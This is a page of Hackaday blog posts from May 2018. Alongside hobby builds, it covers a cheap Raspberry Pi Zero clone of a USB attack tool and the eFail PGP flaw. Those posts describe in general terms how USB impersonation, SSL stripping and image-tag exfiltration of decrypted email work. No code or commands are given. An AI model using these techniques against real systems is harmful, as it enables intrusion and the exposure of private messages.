DIY Pi Zero Pentesting Tool Keeps It Cheap

May 15, 2018 by 14 Comments

It’s a story as old as time: hacker sees cool tool, hacker recoils in horror at the price of said tool, hacker builds their own version for a fraction of the price. It’s the kind of story that we love here at Hackaday, and has been the impetus for countless projects we’ve covered. One could probably argue that, if hackers had more disposable income, we’d have a much harder time finding content to deliver to our beloved readers.

[ Alex Jensen] writes in to tell us of his own tale of sticker shock induced hacking, where he builds his own version of the Hak5 Bash Bunny. His version might be lacking a bit in the visual flair department, but despite coming in at a fraction of the cost, it does manage to pack in an impressive array of features.

This pentesting multitool can act as a USB keyboard, a mass storage device, and even an RNDIS Ethernet adapter. All in an effort to fool the computer you plug it into to let you do something you shouldn’t. Like its commercial inspiration, it features an easy to use scripting system to allow new attacks to be crafted on the fly with nothing more than a text editor. A rudimentary user interface is provided by four DIP switches and light up tactile buttons. These allow you to select which attacks run without needing to hook the device up to a computer first, and the LED lights can give you status information on what the device is doing.

[Alex] utilized some code from existing projects, namely PiBunny and rspiducky, but much of the functionality is of his own design. Detailed instructions are provided on how you can build your own version of this handy hacker gadget without breaking the bank.

Given how small and cheap it is, the Raspberry Pi is gaining traction in the world of covert DIY penetration testing tools. While it might not be terribly powerful, there’s something to be said for a device that’s cheap enough that you don’t mind leaving it at the scene if you’ve got to pull on your balaclava and make a break for it.

WFW 3.11 running on a Thinkpad T400

Windows For Workgroups 3.11 In 2018

May 15, 2018 by 61 Comments

It’s been 25 years since Microsoft released Windows for Workgroups 3.11. To take a trip back to the end of the 16-bit era of operating system, [Yeo Kheng Meng] got WFW 3.11 running on a modern Thinkpad.

To make things difficult, a few goals were set for the project. Obviously, this wouldn’t be much fun in a virtual machine, so those were banned. A video driver would be needed, since WFW 3.11 only supports resolutions up to 640×480 in software. Some basic support for sound would be desirable. Finally, TCP/IP networking is possible in WFW 3.11, so networking hardware would allow access modern internet.

[Yeo Kheng Meng] accomplished all of these goals on a 2009 Thinkpad T400 and throughly documented the process. Some interesting hacks were required, including the design of a custom parallel port sound card based on the Covox Speech Thing. Accessing HTTPS web servers required a man-in-the-middle attack to strip SSL, since the SSL support on WFW 3.11 is ancient and blocked by most web servers today.

If you want your own WFW 3.11 laptop, the detailed instructions will get you there. [Yeo Kheng Meng] has also provided the hardware design for the sound card. You can watch a talk on the process after the break.

Continue reading “Windows For Workgroups 3.11 In 2018”

MSDOS Development With GCC

May 14, 2018 by 19 Comments

It might seem odd to think about programming in MSDOS in 2018. But if you are vintage computer enthusiast or have to support some old piece of equipment with an MSDOS single board computer, it could be just the thing. The problem is, where do you get a working compiler that doesn’t have to run on the ancient DOS machine? Turns out, gcc can do the trick. [RenéRebe] offers a video demo based on a blog post by [Chris Wellons]. You can see the video, below.

The technique generates COM files, not EXE files, so there are some limitations, such as a 64K file size. The compiler also won’t generate code for any CPU lower than a 80386, so if you have a real 8086, 80186, or 80286 CPU, you are out of luck. The resulting code will run in a real DOS environment on a ‘386 or higher or in a simulator like DOSBox.

You might be thinking why not use the DJGPP port of gcc to DOS. That sounds good, but it actually doesn’t produce true DOS code. It produces code for a DOS extender. In addition, [Chris] had trouble getting it to work with a modern setup.

The only real trick here is using the right combination of gcc flags to create a standalone image with the right codes. A COM file is just a dump of memory, so you don’t need a fancy header or anything. You also, of course, won’t have any library support, so you’ll have to write everything including functions to, say, print on the screen. Of course, you can borrow [Chris’] if you like.

The last pieces of the puzzle include adding a small stub to set up and call main and getting the linker to output a minimal file. Once you have that, you are ready to program like it is 1993. Don’t miss part 2, which covers interrupts.

If you pine away for QuickBasic instead of C, go download this. If you just want to run some old DOS games, that’s as close as your browser.

Continue reading “MSDOS Development With GCC”

Tiny Pinball Emulator Is Hugely Impressive

May 14, 2018 by 11 Comments

We were wondering what [Circuitbeard] has been up to lately. Turns out he’s been building a mini pinball cabinet to add to his arcade of self-built games.

[Circuitbeard] was forced to break out of his Raspi comfort zone this time. We’re glad he did because this is one impressive build. Finding the pinball emulation community lacking for Linux, he turned to the LattePanda, a tiny Windows 10 SBC with a built-in Arduino Leonardo. This was really the perfect board because he needed to support multiple displays with a minimum of fuss. That Leonardo comes in handy for converting button presses to key presses inside the Visual Pinball emulator.

The 3mm laser-cut plywood cabinet was designed entirely in Inkscape and sized around the two screens: a genuine 7″ LattePanda display for the playfield, and a 5″ HDMI for the back glass. The main box holds the Lattepanda, two Pimoroni mini speakers, and a fan to keep the board cool.

There’s a lot to like about this little cabinet thanks to [Circuitbeard]’s fantastic attention to detail, which you can see for yourself in the slew of pictures. Look closer at the coin drop—it’s really an illuminated button with a custom graphic. If you want to have a go at emulating this emulator, all the code is up on GitHub. Tilt past the break to watch some modern pinball wizardry in action, and then check out his mini Outrun machine.

If pinball emulators don’t score any points with you, here’s one that’s all wood and rubber bands.

Continue reading “Tiny Pinball Emulator Is Hugely Impressive”

DIY Variacs Get ESP8266 Upgrades

May 14, 2018 by 46 Comments

If you’be been hacking and making long enough, you’ve probably run into a situation where you realize that a previous project could be improved with the addition of technology that simply wasn’t available when you built it. Sometimes it means starting over from scratch, but occasionally you luck out and can shoehorn in some new gear without having to go back to the drawing board.

The two isolated variacs that [nop head] built were already impressive, but with the addition of the ESP8266 he was able to add some very slick additional features which really took them to the next level. He’s done an exceptional job detailing the new modifications, including providing all the source for anyone who might be walking down a similar path.

His variacs have digital energy meters right in the front panel which give voltage, amps, and a real-time calculation of watts. After reading an article by [Thomas Scherrer] about sniffing the SPI data out of one of these meters with an Arduino, [nop head] reasoned he could do the same thing with an ESP8266. The advantage being that he could then pull that data out over the network to graph or analyze however he wishes.

For his older variac, he decided to automate the device by adding a stepper and belt to turn the knob. The stepper is controlled by a Pololu stepper driver, which in turn get’s its marching orders from another ESP8266. He even came up with a simple web interface which allows you to monitor and control the variac from your smart device.

We don’t often see many variacs around these parts, and even fewer attempts at building custom ones. It’s one of those pieces of equipment you either can’t live without, or have never even heard of.

RC Paper Airplane From Guts Of Quadcopter

May 14, 2018 by 10 Comments

Mini indoor drones have become an incredibly popular gift in the last few years since they’re both cool and inexpensive. For a while they’re great fun to fly around, until the inevitable collision with a wall, piece of furniture, or family member. Often not the most structurally sound of products, a slightly damaged quad can easily be confined to a cupboard for the rest of its life. But [Peter Sripol] has an idea for re-using the electronics from a mangled quad by building his own RC controlled paper aeroplane.

[Peter] uses the two rear motors from a mini quadcopter to provide the thrust for the aeroplane. The key is to remove the motors from the frame and mount them at 90 degrees to their original orientation so that they’re now facing forwards. This allows the drone’s gyro to remain facing upwards in its usual orientation, and keep the plane pointing forwards.

The reason this works is down to how drones yaw: because half of the motors spin the opposite direction to the other half, yaw is induced by increasing the speed of all motors spinning in one direction, mismatching the aerodynamic torques and rotating the drone. In the case of the mini quadcopter, each of the two rear motors spin in different directions. Therefore, when the paper plane begins to yaw off-centre, the flight controller increases power to the appropriate motor.

Mounting the flight controller and motors to the paper plane can either be achieved using a 3D-printed mount [Peter] created, or small piece of foam. Shown here is the foam design that mounts the propellers at wing level but the 3D printed version has then under the fuselage and flies a bit better.

Making paper planes too much effort? You could always use the one-stroke paper plane folder, or even the paper plane machine gun.

Continue reading “RC Paper Airplane From Guts Of Quadcopter”

PGP Vulnerability Pre-announced By Security Researcher

May 14, 2018 by 30 Comments

From the gaping maw of the infosec Twitterverse comes horrifying news. PGP is broken. How? We don’t know. When will there be any information on this vulnerability? Tomorrow. It’s the most important infosec story of the week, and it’s only Monday. Of course, this vulnerability already has a name. Everyone else is calling it eFail, but I’m calling it Fear, Uncertainty, and Doubt.

Update: eFail site and paper now available. This was released ahead of Tuesday’s planned announcement when the news broke ahead of a press embargo.

Update 2: The report mentions two attacks. The Direct Exfiltration attack wraps the body of a PGP-encrypted email around an image tag. If a mail client automatically decrypts this email, the result will be a request to a URL containing the plaintext of the encrypted email. The second attack only works one-third of the time. Mitigation strategies are to not decrypt email in a client, disable HTML rendering, and in time, update the OpenPGP and S/MIME standards. This is not the end of PGP, it’s a vulnerability warranting attention from those with a very specific use case.

Update 3: Hackaday has published an in-depth explanation of how eFail works which details the scope of the vulnerability.

[Sebastian Schinzel] announced on Twitter today he will be announcing a critical vulnerability in PGP/GPG and S/MIME email encryption. This vulnerability may reveal the plaintext of encrypted emails. There are currently no fixes — but there’s no proof of concept, or any actual publication of this exploit either. The only thing that’s certain: somebody on Twitter said encrypted email is broken.

The EFF has chimed in on this exploit and advises everyone to immediately disable and uninstall tools that automatically decrypt PGP-encrypted email. It also looks like the EFF came up with a great little logo for eFail as well so kudos on that.

While there are no details whatsoever concerning eFail aside from a recommendation to not use PGP, a few members of the community have seen a pre-press of the eFail paper. [Werner Koch] of GnuPG says eFail is simply using HTML as a back channel. If this is true, PGP is still safe; you just shouldn’t use HTML emails. If you really need to read HTML emails, use a proper MIME parser and disallow access to external links. It should be noted that HTML in email is already an attack vector and has been for decades. You don’t need to bring PGP into this.

Should you worry about a vulnerability in PGP and email encryption? Literally no one knows. European security researchers are working on a publication release right now, but other experts in the field who have seen the paper think it’s not a big deal. There is no consensus from experts in the field, and there is no paper available right now. That last point will change in a few hours, but for now eFail just stands for Fear, Uncertainty, and Doubt.